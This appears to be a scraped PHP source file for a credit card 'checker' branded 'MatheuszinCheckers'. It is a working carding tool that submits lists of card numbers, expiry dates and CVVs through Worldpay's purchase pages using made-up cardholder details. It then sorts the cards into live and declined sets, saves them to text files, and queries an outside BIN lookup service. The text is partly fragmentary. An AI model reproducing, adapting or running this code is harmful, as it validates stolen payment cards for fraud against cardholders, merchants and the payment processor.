Volta para Central MatheuszinCheckers Geradas

MatheuszinCheckers Geradas





true, CURLOPT_COOKIESESSION => true, CURLOPT_COOKIE => $cookiesIn, CURLOPT_HEADER => true, CURLOPT_FOLLOWLOCATION => true, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => true, CURLINFO_HEADER_OUT => true, CURLOPT_SSL_VERIFYPEER => false, CURLOPT_HTTP_VERSION => CURL_HTTP_VERSION_1_1, CURLOPT_POST => true, CURLOPT_POSTFIELDS => $post ); $ch = curl_init($url); curl_setopt_array($ch,$options); $rough_content = curl_exec($ch); $err = curl_errno($ch); $errmsg = curl_error($ch); $header = curl_getinfo($ch); curl_close($ch); $header_content = substr($rough_content, 0, $header['header_size']); $body_content = trim(str_replace($header_content, '', $rough_content)); $pattern = "#Set-Cookie:\\s+(?[^=]+=[^;]+)#m"; preg_match_all($pattern, $header_content, $matches); $cookiesOut = implode("; ", $matches['cookie']); $header['errno'] = $err; $header['errmsg'] = $errmsg; $header['headers'] = $header_content; $header['content'] = $body_content; $header['cookies'] = $cookiesOut; return $header; } function value($str,$find_start,$find_end){ $start = @strpos($str,$find_start); if ($start === false) { return ""; } $length = strlen($find_start); $end = strpos(substr($str,$start +$length),$find_end); return trim(substr($str,$start +$length,$end)); } function dados(){ $nome = file("lista_nomes.txt"); $sobrenome = file("lista_sobrenomes.txt"); $mynome = rand(0, sizeof($nome)-1); $mysobrenome = rand(0, sizeof($sobrenome)-1); $nome = $nome[$mynome]." ".$sobrenome[$mysobrenome]; return $nome; } function email($nome){ $email = preg_replace('<\W+>', "", $nome)."@hotmail.com"; return $email; } function binchecker($link){ $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $link); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $data = curl_exec($ch); curl_close($ch); return $data; } function bandeira($num){ switch (substr($num, 0, 1)){ case '5': $bandeira = "ECMC"; return $bandeira; break; case '4': $bandeira = "VISA"; return $bandeira; break; case '36': $bandeira = "DINERS"; return $bandeira; break; case '37': $bandeira = "AMEX"; return $bandeira; break; default: } } function ap($ap){echo '';} function rp($rp){echo '';} function fila($fila){echo '';} function total($total){echo '';} function Aprovadas($str){echo '';} function Reprovadas($str) {echo '';} if($_POST['Checker']){ /*if ($_POST["g-recaptcha-response"]) { $response = $reCaptcha->verifyResponse( $_SERVER["REMOTE_ADDR"], $_POST["g-recaptcha-response"] ); } if ($response != null && $response->success) {*/ if($_POST['list']){ echo '


'; echo '
-----Aprovadas-----



'; echo '
-----Reprovadas-----

'; $lista = $_POST['list']; $DarkChekers = explode("\r\n",$lista); $DarkChekers = str_replace(array("\\\"","\\'"),array("\"","'"),$DarkChekers); $DarkChekers = str_replace("\r","",$DarkChekers); $DarkChekers = str_replace("\n\n","\n",$DarkChekers); $DarkChekers = array_unique($DarkChekers); $total = total(count($DarkChekers)); $fila = count($DarkChekers); $ap = 0; $rp = 0; for($i=0;$i'); $url = "https://secure.worldpay.com/wcc/purchase"; $post = "PaymentID=".$PaymentID."&Lang=pt&authCurrency=GBP&op-DPChoose-".$bandeira."%5ESSL.x=34&op-DPChoose-".$bandeira."%5ESSL.y=24"; $cookiesIn = $header['cookies']; $header = web($url,$post,$cookiesIn); $url = "https://secure.worldpay.com/wcc/card"; $post = "PaymentID=".$PaymentID."&Lang=pt&cardNoInput=".$num."&cardNoJS=&cardNoHidden=*oculto*&cardCVV=&cardExp.day=32&cardExp.time=23%3A59%3A59&cardExp.month=".$mes."&cardExp.year=".$ano."&name=abilio&address1=rua+jardim&address2=&address3=&town=Padua®ion=&postcode=&country=BR&tel=&fax=&email=abilio%40hotmail.com&op-PMMakePayment.x=14&op-PMMakePayment.y=21"; $cookiesIn = $header['cookies']; $header = web($url,$post,$cookiesIn); if(strpos($header['content'], "pagamento foi realizado com sucesso")){ $data = json_decode(binchecker("https://bins.payout.com/api/v1/bins/".(substr($num, 0, 6)))); $binchecker = "[ $data->country_code - $data->brand $data->issuer - $data->type ]"; Aprovadas("
#F0 $num / $mes / $ano / $cvv $binchecker [LIVE] #MatheuszinCheckers
"); $ap = $ap + 1; ap($ap); }elseif(strpos($header['content'], "Obrigado")){ $hnd = fopen("./semcriatividade.txt", "a"); $data = json_decode(binchecker("https://bins.payout.com/api/v1/bins/".(substr($num, 0, 6)))); $binchecker = "$data->country_code - $data->brand $data->issuer - $data->type"; fwrite($hnd, "CC: $num $mes $ano $cvv"); Aprovadas("
#F0 $num / $mes / $ano / $cvv $binchecker [LIVE] #MatheuszinCheckers
"); fclose($hnd); $ap = $ap + 1; ap($ap); }elseif(strpos($header['content'], "Recusado. Lamentamos, esta transacção foi recusada pelo emissor do cartão. ")){ $hnd = fopen("./die.txt", "a"); $data = json_decode(binchecker("https://bins.payout.com/api/v1/bins/".(substr($num, 0, 6)))); $binchecker = "$data->country_code - $data->brand $data->issuer - $data->type"; fwrite($hnd, "CC: $num $mes $ano $cvv"); Reprovadas("
#F0 $num / $mes / $ano / $cvv $binchecker [DIE] #MatheuszinCheckers
"); fclose($hnd); $rp = $rp + 1; rp($rp); }elseif(strpos($header['content'], "Thank you")){ $data = json_decode(binchecker("https://bins.payout.com/api/v1/bins/".(substr($num, 0, 6)))); $binchecker = "[ $data->country_code - $data->brand $data->issuer - $data->type ]"; Aprovadas("
#F0 $num / $mes / $ano / $cvv $binchecker [LIVE] #MatheuszinCheckers
"); $ap = $ap + 1; ap($ap); } $fila--; fila($fila); ob_flush();flush(); } if(empty($fila)){fila($fila = 0);} if(empty($ap)){ap($ap = 0);} if(empty($rp)){rp($rp = 0);} Echo "

Teste Finalizado!
"; }else{ ?>Confirme que vocГЄ nГЈo Г© um robo!
";}}*/}?>